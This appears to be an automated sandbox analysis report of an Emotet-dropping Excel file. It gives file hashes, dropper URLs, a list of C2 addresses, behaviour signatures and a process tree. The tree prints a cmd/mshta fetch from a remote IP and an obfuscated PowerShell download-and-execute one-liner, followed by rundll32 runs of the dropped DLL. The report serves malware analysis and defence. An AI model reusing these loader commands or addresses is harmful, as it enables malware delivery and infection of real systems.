Analysis

  • max time kernel
    114s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 03:25

General

  • Target

    0deb7724bc95f683eb93b1746358319e52d1e2f8a9f313f99a1b654417c7019c.xls

  • Size

    155KB

  • MD5

    c3a7a697d76164a0cbfeaf385fa74a6a

  • SHA1

    99a585be0f34dbb24a261312d912ac85f85ef0a8

  • SHA256

    0deb7724bc95f683eb93b1746358319e52d1e2f8a9f313f99a1b654417c7019c

  • SHA512

    38dd294b7f69f2f15ea5968c41a2ea8662351000ecabfc4b04272e982e317819f89f57ac9441a01c86e9624cee57aaa47a544c74ac7c4f71b63e7ed2e116db65

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/qqqw/aaas/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/qqqw/aaas/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\0deb7724bc95f683eb93b1746358319e52d1e2f8a9f313f99a1b654417c7019c.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c mshta http://91.240.118.168/qqqw/aaas/se.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3132
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/qqqw/aaas/se.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:1008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqqw/aaas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2368
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:840
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2212
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:816
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zafgbxqc\keeen.xqn",liFpFAqEoQPwh
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1376
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Zafgbxqc\keeen.xqn",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2436
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1008 -s 1656
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3108

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    2c05321ef3ac468ec85717080ed0094c

    SHA1

    dc7ac78ce5d32d6716cc7aa2c34f829d1d34f68e

    SHA256

    1bd58cb752abdb6f374c52f190b463628d3efacade6db9ff6af8afea2f47247d

    SHA512

    0f70c4ebe9b95ef8534d0631f1242df74365c6c9342f61b8bc9c5c1d3b3b55a6e59dde77a900bc1b8e0033447f747c772b25061948ba816286f3186a8e6e86d7

  • \ProgramData\QWER.dll
    MD5

    2c05321ef3ac468ec85717080ed0094c

    SHA1

    dc7ac78ce5d32d6716cc7aa2c34f829d1d34f68e

    SHA256

    1bd58cb752abdb6f374c52f190b463628d3efacade6db9ff6af8afea2f47247d

    SHA512

    0f70c4ebe9b95ef8534d0631f1242df74365c6c9342f61b8bc9c5c1d3b3b55a6e59dde77a900bc1b8e0033447f747c772b25061948ba816286f3186a8e6e86d7

  • \ProgramData\QWER.dll
    MD5

    2c05321ef3ac468ec85717080ed0094c

    SHA1

    dc7ac78ce5d32d6716cc7aa2c34f829d1d34f68e

    SHA256

    1bd58cb752abdb6f374c52f190b463628d3efacade6db9ff6af8afea2f47247d

    SHA512

    0f70c4ebe9b95ef8534d0631f1242df74365c6c9342f61b8bc9c5c1d3b3b55a6e59dde77a900bc1b8e0033447f747c772b25061948ba816286f3186a8e6e86d7

  • memory/816-623-0x00000000051B0000-0x00000000051D7000-memory.dmp
    Filesize

    156KB

  • memory/816-611-0x0000000004FF0000-0x0000000005017000-memory.dmp
    Filesize

    156KB

  • memory/816-609-0x0000000004F90000-0x0000000004FB7000-memory.dmp
    Filesize

    156KB

  • memory/816-607-0x0000000004F30000-0x0000000004F57000-memory.dmp
    Filesize

    156KB

  • memory/816-605-0x0000000004ED0000-0x0000000004EF7000-memory.dmp
    Filesize

    156KB

  • memory/816-603-0x0000000004E50000-0x0000000004E77000-memory.dmp
    Filesize

    156KB

  • memory/1376-620-0x0000000003350000-0x0000000003377000-memory.dmp
    Filesize

    156KB

  • memory/2212-598-0x0000000002CE0000-0x0000000002D07000-memory.dmp
    Filesize

    156KB

  • memory/2368-303-0x000001B8B4FD0000-0x000001B8B500C000-memory.dmp
    Filesize

    240KB

  • memory/2368-275-0x000001B8B4900000-0x000001B8B4922000-memory.dmp
    Filesize

    136KB

  • memory/2368-421-0x000001B89C840000-0x000001B8B49A0000-memory.dmp
    Filesize

    385.4MB

  • memory/2368-356-0x000001B89C840000-0x000001B8B49A0000-memory.dmp
    Filesize

    385.4MB

  • memory/2368-333-0x000001B8B5090000-0x000001B8B5106000-memory.dmp
    Filesize

    472KB

  • memory/2368-483-0x000001B89C840000-0x000001B8B49A0000-memory.dmp
    Filesize

    385.4MB

  • memory/2436-635-0x0000000004DA0000-0x0000000004DC7000-memory.dmp
    Filesize

    156KB

  • memory/2436-629-0x0000000004C70000-0x0000000004C97000-memory.dmp
    Filesize

    156KB

  • memory/2436-642-0x0000000005010000-0x0000000005037000-memory.dmp
    Filesize

    156KB

  • memory/2436-638-0x0000000004E20000-0x0000000004E47000-memory.dmp
    Filesize

    156KB

  • memory/2436-633-0x0000000004D30000-0x0000000004D57000-memory.dmp
    Filesize

    156KB

  • memory/2436-631-0x0000000004CD0000-0x0000000004CF7000-memory.dmp
    Filesize

    156KB

  • memory/2740-117-0x00007FFEC7750000-0x00007FFEC7760000-memory.dmp
    Filesize

    64KB

  • memory/2740-116-0x00007FFEC7750000-0x00007FFEC7760000-memory.dmp
    Filesize

    64KB

  • memory/2740-129-0x00007FFEC4A30000-0x00007FFEC4A40000-memory.dmp
    Filesize

    64KB

  • memory/2740-118-0x00007FFEC7750000-0x00007FFEC7760000-memory.dmp
    Filesize

    64KB

  • memory/2740-115-0x00007FFEC7750000-0x00007FFEC7760000-memory.dmp
    Filesize

    64KB

  • memory/2740-121-0x00007FFEC7750000-0x00007FFEC7760000-memory.dmp
    Filesize

    64KB

  • memory/2740-128-0x00007FFEC4A30000-0x00007FFEC4A40000-memory.dmp
    Filesize

    64KB

  • memory/2740-658-0x00007FFEC7750000-0x00007FFEC7760000-memory.dmp
    Filesize

    64KB

  • memory/2740-659-0x00007FFEC7750000-0x00007FFEC7760000-memory.dmp
    Filesize

    64KB

  • memory/2740-660-0x00007FFEC7750000-0x00007FFEC7760000-memory.dmp
    Filesize

    64KB

  • memory/2740-661-0x00007FFEC7750000-0x00007FFEC7760000-memory.dmp
    Filesize

    64KB